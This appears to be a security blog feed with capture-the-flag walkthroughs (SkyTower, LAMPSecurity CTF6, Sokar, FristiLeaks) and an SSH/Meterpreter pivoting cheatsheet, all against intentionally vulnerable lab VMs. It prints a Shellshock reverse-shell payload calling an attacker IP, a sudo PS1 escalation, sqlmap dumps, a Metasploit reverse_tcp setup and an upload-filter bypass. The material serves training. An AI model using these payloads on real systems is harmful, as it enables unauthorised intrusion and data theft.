performance_schema
$ mysql -u root -p SkyTech
Enter password: root
show tables;
\q
Tables_in_SkyTech
login



mysql -u root -p SkyTech
Enter password: rootroot
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
mysql -u root -p SkyTech
Enter password: root
select * from login;
\q
id    email    password
1    john@skytech.com    hereisjohn
2    sara@skytech.com    ihatethisjob
3    william@skytech.com    senseable

Privilege Escalation - Password Reuse

Password reuse for the user sara was possible using the previously discovered credentials.

[root:~]# ssh sara@127.0.0.1 -p 4444 -t  "/bin/sh"
sara@127.0.0.1's password:
$ sudo -l
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

The user sara had sudo access to the binary /bin/cat, path traversal was used to cat the contents of /root/flag.txt which contained the root password.

$ sudo /bin/cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
$

Getting root:

With the previously discovered credentials it was possible to su - to root:

$ su -
Password:
root@SkyTower:~# id
uid=0(root) gid=0(root) groups=0(root)
root@SkyTower:~# cat flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
root@SkyTower:~#

Conclusion

I enjoyed the SQL injection filtering evasion, overall a short CTF that can easily be done in an evening.

Thanks for the VM :)

SSH & Meterpreter Pivoting Techniques

Dhruv Ambaliya — Wed, 20 Mar 2024 00:52:10 +0000

What is Pivoting ?
SSH Pivoting Cheatsheet
Configure Metasploit to use a SSH Pivot
- Don’t use 127.0.0.1 with Metasploit
Meterpreter Pivoting Cheatsheet
Pivoting Example Diagrams

What is Pivoting ?

Pivoting is a technique used to route traffic through a compromised host on a penetration test.

When conducting an external penetration test you may need to route traffic through a compromised machine in order to compromise internal targets.

Pivoting, allows you to leverage pen test tools on your attacking machine while routing traffic through other hosts on the subnet, and potentially allowing access to other subnets.

SSH Pivoting Cheatsheet

SSH Port Forwarding

Command	Description
`ssh -L 9999:10.0.2.2:445 user@192.168.2.250`	Port 9999 locally is forwarded to port 445 on 10.0.2.2 through host 192.168.2.250

SSH Port Forwarding with Proxychains

Command	Description
`ssh -D 127.0.0.1:9050 root@192.168.2.250`	Dynamically allows all port forwards to the subnets availble on the target.

Dynamic Proxychain Warning

Dynamic Proxychain SSH port forwarding does not work with nmap and metasploits meterpreter shells won't spawn.

If you attempt to spawn a shell via Meterpreter, you’ll get an error similar to the following:

meterpreter > execute -f cmd.exe -i -H
|S-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:41713-<--timeout

Using Proxychain port forwards

When using a Proxychain port forward, all commands need to be prefixed with the proxychain command, this instructs the application traffic to route through the proxy.

Connecting to RDP via Proxychains Dynamic Port Forwarding

root:~# proxychains rdesktop TARGET-IP

Configure Metasploit to use a SSH Pivot

The following is an example of how to configure Metersploit to use a SSH portward. In this example port 9999 is forwarded to the target and the attacking machine has an IP address of 192.168.2.100:

Setup the port forward (instructions above), then configure msfconsole as follows (using MS08_067 in this example).

 msf exploit(ms08_067_netapi) > show options

 Module options (exploit/windows/smb/ms08_067_netapi):

    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
   RHOST    0.0.0.0          yes       The target address
    RPORT    9999             yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


 Payload options (windows/meterpreter/reverse_tcp):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
    LHOST     192.168.2.100   yes       The listen address
    LPORT     443              yes       The listen port


 Exploit target:

    Id  Name
    --  ----
   0   Automatic Targeting

Don’t use 127.0.0.1 with Metasploit

Update: You can now use 127.0.0.2

Other 127.0.0.0 addresses can also be used (127.0.0.3,127.0.0.4 etc), but not 127.0.0.1

The example above uses 0.0.0.0 Not 127.0.0.1, never use 127.0.0.1 with Metasploit or you’ll get the following error after you attempt to do anything post exploit:

 exploit(ms08_067_netapi) > exploit

 [*] Started reverse handler on 192.168.14.183:443
 [*] Automatically detecting the target...
 [*] Fingerprint: Windows XP - Service Pack 3 - lang:English
 [*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
 [*] Attempting to trigger the vulnerability...
 [*] Sending stage (769536 bytes) to 192.168.15.252

msf meterpreter > getuid
 [-] Session manipulation failed: Validation failed: Address is reserved ["/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/validations.rb:56:in `save!'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/attribute_methods/dirty.rb:33:in `save!'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/transactions.rb:264:in `block in save!'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/transactions.rb:313:in `block in with_transaction_returning_status'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/connection_adapters/abstract/database_statements.rb:192:in `transaction'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/transactions.rb:208:in `transaction'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/transactions.rb:311:in `with_transaction_returning_status'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/transactions.rb:264:in `save!'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/db.rb:377:in `block in report_host'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/connection_adapters/abstract/connection_pool.rb:129:in `with_connection'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/db.rb:323:in `report_host'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/db.rb:2031:in `block in report_event'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/connection_adapters/abstract/connection_pool.rb:129:in `with_connection'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/db.rb:2025:in `report_event'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/framework.rb:222:in `report_event'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/framework.rb:331:in `session_event'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/framework.rb:408:in `block in on_session_output'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/framework.rb:407:in `each'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/framework.rb:407:in `on_session_output'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/event_dispatcher.rb:183:in `block in method_missing'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/event_dispatcher.rb:181:in `each'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/event_dispatcher.rb:181:in `method_missing'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/session_manager.rb:242:in `block in register'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:271:in `call'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:271:in `print_error'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:436:in `unknown_command'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:411:in `run_single'", "/opt/metasploit/apps/pro/msf3/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:190:in `call'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:190:in `run'", "/opt/metasploit/apps/pro/msf3/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'", "/opt/metasploit/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:396:in `_interact'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/interactive.rb:49:in `interact'", "/opt/metasploit/apps/pro/msf3/lib/msf/ui/console/command_dispatcher/core.rb:1745:in `cmd_sessions'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'", "/opt/metasploit/apps/pro/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:142:in `cmd_exploit'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:200:in `run'", "/opt/metasploit/apps/pro/msf3/msfconsole:148:in `<main>'"]

Meterpreter Pivoting Cheatsheet

Assuming you’ve compromised the target machine and have a meterpreter shell, you can pivot through it by setting up a meterpreter port forward.

Command	Description
`portfwd add –l 3389 –p 3389 –r target-host`	Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
`portfwd delete –l 3389 –p 3389 –r target-host`	Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
`portfwd flush`	Meterpreter delete all port forwards
`portfwd list`	Meterpreter list active port forwards
`run autoroute -s 192.168.15.0/24`	Use Meterpreters autoroute script to add the route for specified subnet `192.168.15.0`
`run autoroute -p`	Meterpreter list all active routes
`route`	Meterpreter view available networks the compromised host can access
`route add 192.168.14.0 255.255.255.0 3`	Meterpreter add route for 192.168.14.0/24 via Session 3.
`route delete 192.168.14.0 255.255.255.0 3`	Meterpreter delete route for 192.168.14.0/24 via Session 3.
`route flush`	Meterpreter delete all routes

Meterpreter Port Forwards are flakey

Meterpreter port forwards can be a bit flakey, also the meterpreter session needs to be remain open.

In order to connect to the compromised machine you would run:

Connect to RDP via Meterpreter Port Forward

root:~# rdesktop 127.0.0.1

Pivoting Example Diagrams

Pivoting can be a bit hard to understand on paper, so here are some diagrams for clarification with the associated commands.

Starting Point

You’ll need to have access to a compromised machine on the target network, depending on the compromised machines configuration you may or may not need root.

Routing Traffic to the Same Subnet

####Example commands

SSH Pivoting using Proxychains

Dynamic SSH Pivoting Command using proxy chains

root:~# ssh -D 127.0.0.1:9050 root@192.168.2.2

You could then connect to Target 2’s RDP server using:

Connecting to RDP via Proxychains Dynamic Port Forwarding

root:~# proxychains rdesktop 192.168.2.3

SSH Port Forwarding Command

RDP SSH Port Forwarding

root:~# ssh -L 3389:192.168.2.3:3389 user@192.168.2.2

You could then connect to Target 2’s RDP server using:

Connecting to RDP via SSH Port Forwarding

root:~# rdesktop 127.0.0.1

SSH and Meterpreter Pivoting

This example uses SSH pivoting and Meterpreter port forwarding to access machines on subnet 2.

Example commands

The above commands would be leveraged to reach Target 2, from Target 2 to Target 3, meterpreter would be used. Follow the meterpreter portwarding example above for a MS08-067 example.

If this was helpfull, click tweet below.

Enjoy.

LAMP Security CTF6 - Walkthrough

Dhruv Ambaliya — Mon, 04 Mar 2024 19:40:59 +0000

Difficulty Rating:

Author Description
Enumeration
- Host Service Enumeration
Web Application Enumeration
SQLMap - SQL Injection
Web Application Exploitation
Local Privilege Escalation

Author Description

The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products.

Author: madirish2600

Download: VulnHub

Dislcaimer: Multiple Entry Points

The LAMPSecurity series is not particularly challenging, for each VM in the series I've targeted the web application as the entry point.

Enumeration

Host Service Enumeration

nmap -v -p 1-65535 -sV -O -sT 192.168.30.131

Port	Service	Version Detection
`TCP: 22`	SSH	OpenSSH 4.3 (protocol 2.0)
`TCP: 80`	HTTP	Apache httpd 2.2.3 ((CentOS))
`TCP: 110`	pop3	Dovecot pop3d
`TCP: 111`	rpcbind	N/A
`TCP: 143`	IMAP	Dovecot imapd
`TCP: 443`	HTTPS	Apache httpd 2.2.3 ((CentOS))
`TCP: 621`	RPC	N/A
`TCP: 993`	IMAP SSL	Dovecot imapd
`TCP: 995`	POP3 SSL	Dovecot pop3d
`TCP:3306`	MySQL	MySQL 5.0.45

Web Application Enumeration

Inspection of the Web Application indicated it was vulnerable to SQL injection.

SQLMap - SQL Injection

SQLMap confirmed SQL injection) was possible.

[ root:~]# sqlmap -o -u "http://192.168.221.131/?action=login" --forms --dbs

available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] roundcube
[*] test

SQLMap form enumeration:

[root:~]# sqlmap -o -u "http://192.168.221.131/?action=login" --forms  -D cms
--tables

Database: cms
[3 tables]
+-------+
| user  |
| event |
| log   |
+-------+

SQLMap database dump + admin account hash cracked:

[root:~]# sqlmap -o -u "http://192.168.221.131/?action=login" --forms  -D cms
-T user --dump

Database: cms
Table: user
[1 entry]
+---------+---------------+----------------------------------------------+
| user_id | user_username | user_password                                |
+---------+---------------+----------------------------------------------+
| 1       | admin         | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) |
+---------+---------------+----------------------------------------------+

Web Application Exploitation

Using the previously discovered admin account credentials, it was possible to login to the web application and upload a php reverse shell using an image upload form.

Local Privilege Escalation

A successful reverse shell was establish and the kernel appeared to be vulnerable to a well know Linux 2.6 kernel udev exploit.

sh-3.2$ uname -ar
Linux localhost.localdomain 2.6.18-92.el5 #1 SMP Tue Jun 10 18:49:47 EDT 2008
i686 i686 i386 GNU/Linux

The exploit requires the PID for the udev process, the exploit does not work flawlessly as you can see below it may take several attempts to get a root shell.

Thanks for the VM :)

Sokar - Walkthrough

Dhruv Ambaliya — Fri, 23 Feb 2024 14:00:10 +0000

Difficulty Rating:

Description
Enumeration
Reverse Shell
Local Enumeration
Shellshock Local Privilege Escalation
Root Flag

Description

Sokar was a vulnhub competition, unfortunately I did not have enough free time to compete.

Author: @_RastaMouse

Download: VulnHub

Enumeration

Port Scanning

nmap -v -p 1-65535 -sV -O -sT 192.168.30.148

Service Enumeration

Port	Service	Version Detection
`TCP: 591`	HTTP	Apache httpd 2.2.15 ((CentOS))

HTTP Enumeration

Inspection of the Web Application revealed /cgi-bin/cat which indicated it could be vulnerable to shellshock.

Shellshock

The Shellshock exploit was used to execute remote commands on the target system, however a reverse shell or bind shell were not possible due to restrictive ingress and egress firewall rules. This made for a painful local enumeration of the system via Burp Suite.

Identify Current User

Shellshock home dir perms

Shellshock files owned by user bynarr

The file /tmp/stats appeared to get updated every few minutes, indicating a cronjob could be running.

Shellshock mail spool readable

The above disclosed bynarrs passwords and the outbound port 51242 rule for the user.

Reverse Shell

The following shellshock payload was sent using Burp Suite:

User-Agent: () { :;};echo;/bin/echo '/bin/bash -i >& /dev/tcp/192.168.221.139/51242 0>&1 ' > /home/bynarr/.profile;

The cronjob called the .profile file and execute the file contents.

A reverse shell was successfully spawned as the user bynarr

[root:~/Downloads]# nc.traditional -lp 51242 -vvvv
listening on [any] 51242 ...
192.168.221.148: inverse host lookup failed: Unknown host
connect to [192.168.221.139] from (UNKNOWN) [192.168.221.148] 59533
bash: no job control in this shell

Local Enumeration

The following disclosed several bash environment variables were permitted to run as the user bynarr with sudo permissions.

[bynarr@sokar ~]$ sudo -l
sudo -l
Matching Defaults entries for bynarr on this host:
    !requiretty, visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User bynarr may run the following commands on this host:
    (ALL) NOPASSWD: /home/bynarr/lime

Shellshock Local Privilege Escalation

The following shellshock payload was crafted to successfully escalate permissions to root:

sudo PS1="() { :;} ;  /bin/sh" /home/bynarr/lime

Root Flag

[bynarr@sokar tmp]$ sudo PS1="() { :;} ;  /bin/sh" /home/bynarr/lime
sudo PS1="() { :;} ;  /bin/sh" /home/bynarr/lime
sh-4.1# ls -la /home/bynarr/lime
ls -la /home/bynarr/lime
-rwxr-xr-x 1 root root 368 Jan 27  2015 /home/bynarr/lime
sh-4.1# cat /root/flag
cat /root/flag
                0   0
                |   |
            ____|___|____
         0  |~ ~ ~ ~ ~ ~|   0
         |  |   Happy   |   |
      ___|__|___________|___|__
      |/\/\/\/\/\/\/\/\/\/\/\/|
  0   |    B i r t h d a y    |   0
  |   |/\/\/\/\/\/\/\/\/\/\/\/|   |
 _|___|_______________________|___|__
|/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/|
|                                   |
|     V  u  l  n  H  u  b   ! !     |
| ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ |
|___________________________________|

=====================================
| Congratulations on beating Sokar! |
|                                   |
|  Massive shoutout to g0tmi1k and  |
| the entire community which makes  |
|         VulnHub possible!         |
|                                   |
|    rasta_mouse (@_RastaMouse)     |
=====================================

Thanks for the VM :)

FristiLeaks 1.3 Walkthrough

Dhruv Ambaliya — Thu, 15 Feb 2024 00:00:00 +0000

Difficulty Rating:

Author Description
PHP Reverse Shell
Local Enumeration
- /home/admin
Privilege Escalation
Root Flag

Author Description

A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..

VMWare Users - MAC Address

If you are a VMWare user, you'll need to manually set the MAC Address to 08:00:27:A5:A6:76.

Port Scanning

nmap -v -p 1-65535 -sV -O -sT 192.168.221.150

Service Enumeration

Port	Service	Version Detection
`TCP: 80`	HTTP	Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

HTTP Enumeration

Enumeration of the web application, revealed the page /fristi with the following form:

Page source interrogation revealed the following code comment:

<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->

The following base64 encoded image was also discovered and decoded to reveal an image containing the string: keKkeKKeKKeKkEkkEk

echo "iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx\njwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl\nS0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw\nB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f\nm63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ\nZv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb\nDpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd\njJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU\n12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5\nuvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1\n04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq\ni1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg\ntOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws\n30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl\n3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK\nul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q\nmD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34\nrPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe\nEPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH\nAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk\nCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR\nU5ErkJggg==" | base64 --decode
 1274* echo "iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx\njwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl\nS0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw\nB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f\nm63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ\nZv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb\nDpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd\njJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU\n12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5\nuvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1\n04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq\ni1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg\ntOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws\n30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl\n3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK\nul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q\nmD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34\nrPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe\nEPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH\nAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk\nCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR\nU5ErkJggg==" | base64 --decode > image.png

The following credentials were used to login to the web application:

Username	Password
eezeepz	`keKkeKKeKKeKkEkkEk`

PHP Reverse Shell

The file name shell.php.png was used to bypass the web application filtering, the file was still executed as PHP (likely due to incorrectly configured Apache MIME types). A reverse shell successfully connected back to a netcat listener.

[root:~]# netcat -n -v -l -p 443
listening on [any] 443 ...
connect to [192.168.221.139] from (UNKNOWN) [192.168.221.150] 34400
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 18:26:33 up  5:37,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$ whoami
whoami
apache

Local Enumeration

Enumeration of the users home dir found several binary files and the following txt file:

sh-4.1$ cat notes
cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry

The following directory traversal (the command had to originate from /usr/bin/) was used to set the permissions for /home/admin world readable.

echo "/usr/bin/../../bin/chmod -R 777 /home/admin" > /tmp/runthis

/home/admin

Inspection of /home/admin disclosed the following:

sh-4.1$ cd /home/admin
cd /home/admin
sh-4.1$ ls -la
ls -la
total 652
drwxrwxrwx. 2 admin     admin       4096 Nov 19 02:03 .
drwxr-xr-x. 5 root      root        4096 Nov 19 01:40 ..
-rwxrwxrwx. 1 admin     admin         18 Sep 22 12:40 .bash_logout
-rwxrwxrwx. 1 admin     admin        176 Sep 22 12:40 .bash_profile
-rwxrwxrwx. 1 admin     admin        124 Sep 22 12:40 .bashrc
-rwxrwxrwx  1 admin     admin      45224 Nov 18 13:42 cat
-rwxrwxrwx  1 admin     admin      48712 Nov 18 14:14 chmod
-rwxrwxrwx  1 admin     admin        737 Nov 18 14:48 cronjob.py
-rwxrwxrwx  1 admin     admin         21 Nov 18 15:21 cryptedpass.txt
-rwxrwxrwx  1 admin     admin        258 Nov 18 15:20 cryptpass.py
-rwxrwxrwx  1 admin     admin      90544 Nov 18 13:49 df
-rwxrwxrwx  1 admin     admin      24136 Nov 18 13:40 echo
-rwxrwxrwx  1 admin     admin     163600 Nov 18 13:42 egrep
-rwxrwxrwx  1 admin     admin     163600 Nov 18 13:42 grep
-rwxrwxrwx  1 admin     admin      85304 Nov 18 13:41 ps
-rw-r--r--  1 fristigod fristigod     25 Nov 19 01:47 whoisyourgodnow.txt
sh-4.1$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
sh-4.1$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

The following python script appeared to create the above string in cryptedpass.txt:

sh-4.1$ cat cryptpass.py
cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

The above script was modified on the attacking machine to decode the string:

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

def decodeString(str):
    string = str[::-1]
    string = string.encode("rot13")
    return base64.b64decode(string)

print decodeString(sys.argv[1])

String successfully decoded:

[root:~]# python reverse.py "=RFn0AKnlMHMPIzpyuTI0ITG"
LetThereBeFristi!

Using the previously decoded string it was possible to su - to the user fristigod.

sh-4.1$ python -c 'import pty;pty.spawn("/bin/sh")'
python -c 'import pty;pty.spawn("/bin/sh")'
sh-4.1$ su - fristigod
su - fristigod
Password: LetThereBeFristi!

-bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)

Enumeration as the user fristigod revealed the SUID binary: /var/fristigod/.secret_admin_stuff/doCom.

-bash-4.1$ ls -la /var/fristigod
ls -la /var/fristigod
total 16
drwxr-x---   3 fristigod fristigod 4096 Nov 25 05:55 .
drwxr-xr-x. 19 root      root      4096 Nov 19 01:41 ..
-rw-------   1 fristigod fristigod  864 Nov 25 06:09 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4096 Nov 25 05:53 .secret_admin_stuff
-bash-4.1$ cd .se
cd .secret_admin_stuff/
-bash-4.1$ ls
ls
doCom
